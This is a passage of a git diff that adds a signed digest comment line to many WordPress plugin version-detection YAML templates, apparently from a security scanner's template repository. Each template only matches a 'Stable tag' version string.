4b0a00483046022100ec0d6a0762797551cde5d840473a28ad0cf77cd0dd11ff0e2b4c7a82930a11ba022100ea8d58ca20b5811d048cb89892208a05e950f158567dc2fef6a474312c071e93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..69bd9ae6d3 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205abe3333b14390a9a02e0a9a4150e3b9654dfaf7775cb8bddfda8151d90b482d02203ae7bc939996aab653c56ad3410f752e58166afb45baf1a40383a099760d9418:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..592cd3c4f4 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220273d3545c799d747229b103499a0eb5fd2958e97aa5af1ef4d7d0cab5bcc1ef902201b54b66a6e344428d8d8e3cf9b01ff5698da56951cbaa049d60b1faa839d689c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..0a71f373d0 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b1f7789131a9f093b6e035100356eaa8360674a33edf981e84d30390bcf66b3f02205fedd801f9fdd8c3797ca0511b94bf5bd5939029a17882e8e11664adb36da551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..7ab44d13e6 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022028e45bec06e6ccc61a29a2ad2b541da20981bfe87115c351b3e43d66014917ca02200f05d96141ab7db577ff9402a4738f733386ce0655cae8e23dc24a72a147f371:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..4ba2b5193b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022026cef4606ea9d496b03acbb2faf6f14b90fdf7a7a6d5f1fea5f7e8d0f6bb86c502203400b24faf8269557a18440054bc028c01d06a4407b6b5774143e11b270deeac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..385acdf8d8 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202a67c94f0ef59972aed4fab805ebd224e508063b02a8f738dd8727014711ef040220262f647ea3e1508e395b817c9291c816c6caf18fe36ad504f4b0c15249914eb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..324d67a809 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220634bb3664020ae84b93aad0527d7dee85999f841bbb3fe02ac58875b0c86569b0220175248133afe2e3ff82dda46d5455020fc2a76dfac68395d8eb1aa3d56e38ec0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..785acde2d4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f028e90fa6ea25c767e8870166a69582a75cb02384305a2c7ccf9b52759347ac022100818ff8b19007b69fcf0e7425f5b2cdd7f053ea9ce8e227703ac04e5637e4c7fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..d11c4fbdbc 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022038ead4a2f4b82c6d8e7d1f60759cbecf83651e26fef84739c85f4ddf024b9919022100b2e2e8c8788c76d038122441a526218114165129f6a44d3fabeaba9bf03743d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..dc456fe409 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d822a1cae17d644642c3c2dd8b3973cbf350063d905f61149b28c851a51c13e50221009e968fcf161f4342fcbd619bc3fb6b5ca54f78ab0579232a0e69cc5d79bddc1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..0f7864431a 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206dbf69e571e0dd93676e434cdd7881cc04e41e30add07f9cda817b62695c253e022100d1c8c4e9385d9ef93948e26e42034e11a3e5f5f54c4677bd4eae4e6b601b8b98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..ebb851afbf 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201e14b1ad042596c87199c7ec24f9a6090137a5a5ebccb74da978adbf338f660c022060143c875a8a7d4de5bd2dee3524626b9ad6ea3bc4b2fc76fd73787890637e93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..f3f8a1ec4d 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f6b0fc37fbeeb5653a3a799513dbdee9523c6e79593509b01109e191eae012d90220076493e1c7773aa2b9da9a926b4717b506533f5b164c3faf6a7689c49a00aa53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..29d4f1c3a3 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207905ab0e9481805a8320c197fb489e0aaff0132199cc12361aa86bedfc5e640b02207ce91ed8e6f2b5327d970814284ce85bc7e10703f437b8aae649d5b8b98d534e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 540d535ecc..6fee280bbb 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a088e6ee96733a1bfd08c41dae81ad864c6c04c3831b6dee7927857bef74c1ea02204fa74384e1e04de0498f162545061ca1c1d57f69440e3e0276232f846948a547:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..feb63fb9c3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b4961d60bc926ccb84d777130c520e70d206400b201b9066c22015857167bf48022100921f7f532c4c93178e92da46930c76a0dbf6d342dbb83e3e53d7a02310e87527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..74dfa66736 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f84750e61cfc16da55e1ee06e8a8c265feb35a96aaee68305a0df0df603cbd2022100e5a455530a8058078631b1b744de95c08625ebd6ac9df31294480aa06b599c86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..4e3da4149a 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d5d93493a35c88d252a492e44c3044eb790a04cbdaea8dcdd17351b0a87caf19022100f14e10428a687a20acfb2033cb7814545012411cb2d373009d68854a08ac0918:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..1b06b2b6a7 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008d1566cbca04798c4732d5e7abc57da6df2e3d03add50dd370ee53cc1e39cbd00220050b157b1828af27a8911a36ec793676a7830d33fde111bd36d73acb8aef6e92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..0d4dc19203 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022018f381cb3fb6ef33306b38ff1cdae2aff18623a9c984bd5b1789226b95ced573022100fbffeecb867dc88a968833deca4bc93d9a0de0c4a6d0f5e4b5bd9bf0b3b457f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..18896471db 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ae2669259db10b146cf420914aaf5da15e2f0ae499825357a01811afe2b36716022100df1b7ef8ab50c02976536b0d9f506933a6c4b2064df729dfa98e2c056af1085f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..a89ce112b6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205757b5f27e30ef74df7ede4e4f37b55aa7549434d6d5c56d7d4242cf61bd6880022100ed05d21d9ac2bc89f7ef1d453cfffdba3f66bd1146ac92f21b312196dde079df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..ccbf9e9c76 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c36272b824bebb923be564273840adb71549f75170c5585e6d7aa466869c640a022100b2fc948719f72c5afa089063d463ba2ba3e0060218b126a42f7072ad90a4f8b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..e8c239e2b5 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206a1a23c829c0cff895556499a89db43c6ebc3e8670ca887a82e23ceb7363fd7302206a2f6796fad76f7478c29037188d3af28d292905dfb9605538229198a482969d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..0fef0c27e6 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200bb9a0adfa19afe2aec7a379c766c656679aac41b3e30230d5df4752f3de9aeb02205b186280f641d3705b752732d255d16c020b3281b76c426714bff5964dde950b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..912e9e78c4 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022034eff879eb8b030867be9045b42a802060de6b59bf74d1869791d8a46444ffc7022100e97c12b0f8b152c93a61b171bee8f0b51e8067dfb01ad7cf783560426fca7218:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..de7605ab24 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b9d8a10175c7910fe3547239b4ed85d104b851fa259e866351ef37327de6661d022100c00a6384ca5470784e912c30c68f9aedb042d66c4e1d5794029d06052e274cd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..2cf989a881 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206349b495673fc40469ccc102027f32c0531960d860f75514b61f55ae9269482e02207769fbbb8d5df1f5d7033054335f13d6f5a1ad0f4d9e2f5a38fd56db0083b789:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..68e031ad54 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207344f96f3e07c04df372f4516a0afa90c76863e5fac796df2af68b3ad677e61f02207d7f8ac09eaa91c3e2346f67aaa976836448a3cbc8fc278c79dc40dfed26e7b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..6ba29314b7 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d9bfbf697ccc09ee214d214a139b984f7ce9ddc04035043e40ea915a98907328022006274430d76520c5685b2756a54e4b47b04de3d7fb2327a6e664a07592cf0d0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..d86295c2a4 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207da7bef9ba7329f7fb025ebd0a85d1c88ec8e4212bad4cc494afb900c846be7502202c79e8099bc6c74ec5f3e46364b28a0aecc3100ace221d8cb4e507d656a4c982:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..26ad677571 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f04f33143c33ce2f34e15e522615d446bcd27e7ef6f6fd9d576461c5aae652fb02206ca5ea03d4e51407f24b7423f51d31521519c31a48a5e0e0272e8cc8fd1b62d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..5974ddaf0a 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200c09fa3b4fb56038714f0a1abb328127663c99f5816c3dbc119558b61a0e2a1502206180a7e7614367cb91cd161e987ae871616f799a5d4fd794eb474618d997779f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..fd14f6f937 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205f7177cba5d916580d27c2b7e48e1aa3dc476ddd5bf2e284e46b112074f531c802206befebe9e79b9bc415feaffc1c7d6f185a5cfe21bf0507cdc8c241daaec817ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..9c5f5d8aef 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210098637d331f1500249dbde2497e65dddad7250bab54019e7718d4036832ccd5fc02207a8ba591f44412e4787a07da1a77b9f4f025f9edf341375ed05e03625f576b0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..5d94e41a16 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220158dabb5dff50019632d0954ef0b902ce0a2587c01beb51eafed9333fe5cfae0022078f22553d10285da4121b84340bd1d4c3c2ce0219643c52d398223faef01429e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..c64b408a9e 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204bb826bcb4467519289b81ceeeb11c4ea3ef2a89aa04ef715e1e6426eff374f50220376fe3bd288154a7769c3c3c82b123a1c8f7a0f40c228c185af8eaeaee23a165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..0e05a023e8 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205f3a96fe2854594ef813b9bae23deb63307f58973b43cafea3d39204eeb73ce7022100aae7f6cd05e9be8caf772f158b0580d6388d0ce93760bbc613c13b05facb27c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..8441883f02 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100db55c1e7f984e1b1d08e44e11158adc8d9167d8b386b53a27e38d9c427d0a87f02206be8cdb6fa1f5c2579994d286cf337d4f84b8b41727d58ee32b9e50ccd007803:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..82bce2c153 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f20ef9ce0e8bc9898947078481223b8bfee8ab14f85c4d39136b603eec2ab77602201acd5ac9aaf7fbf92b67ef87991f59c4f1cdf53a59b338ae905764f1a0bca534:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..26d34d4d85 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fd0b721166ddbbff62b58f992cf024800e2dce68f7da7cc51b1e38c41ad2cdfb022100f3239fd684dca8554ce0302211ee3746af5a1f962ded1253652e4db3f107a091:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..6e0a6bea03 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ae86cbe29bab5b3976949fcbfd853f40806e9b2b674e31782c85c95a7b3394b302201a1c5e718506070fea5cde6c6a3cc2900462b410044f5eeb89e08410c020cf10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..2a9fbe17e1 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e7838f6a4a57024be6b04d7c4cb9cf84ab8b160b1d11b669c77ea1d849f5b740220478945c826585cbd89df605896721719da847582d2651f4cb44447171fdeae9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..9fa5fd9032 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205c1fb43998d218a44879efca1733df53128fec13c66eab0d542e0a5dbfb518dd022100822d25cb9b1a3695924178f7d1c513d1eb1ae177cb855e5b4b449fc02eb2873e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..96b660ed24 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e7767f9199627b42c8edaa8d8a0ea128a2ce404431e8b705719455f6eeb4099022015ce8631e69247990a48c0ba68d5a322e04d73c9ff5af2036643f033cff3a28a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..9845d455da 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c6500b48a0dac27bf39bd6b0be958e668116e92a39a04c5660aecd2afa394060022100a16ee76818b4d76f0fa84de5711cf6eb957163cc367b4afb05c73d85be9f78df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..af02677f45 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f0dfc41a593dc1e67a5f6615e055cc931c3afbee2108c7d4c01fced8d02419750220282749dd950770ea4df8501d0610e9c07079eb2e7cab8b3bc58917b7223d2e4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..91fef25f5c 100644 --- 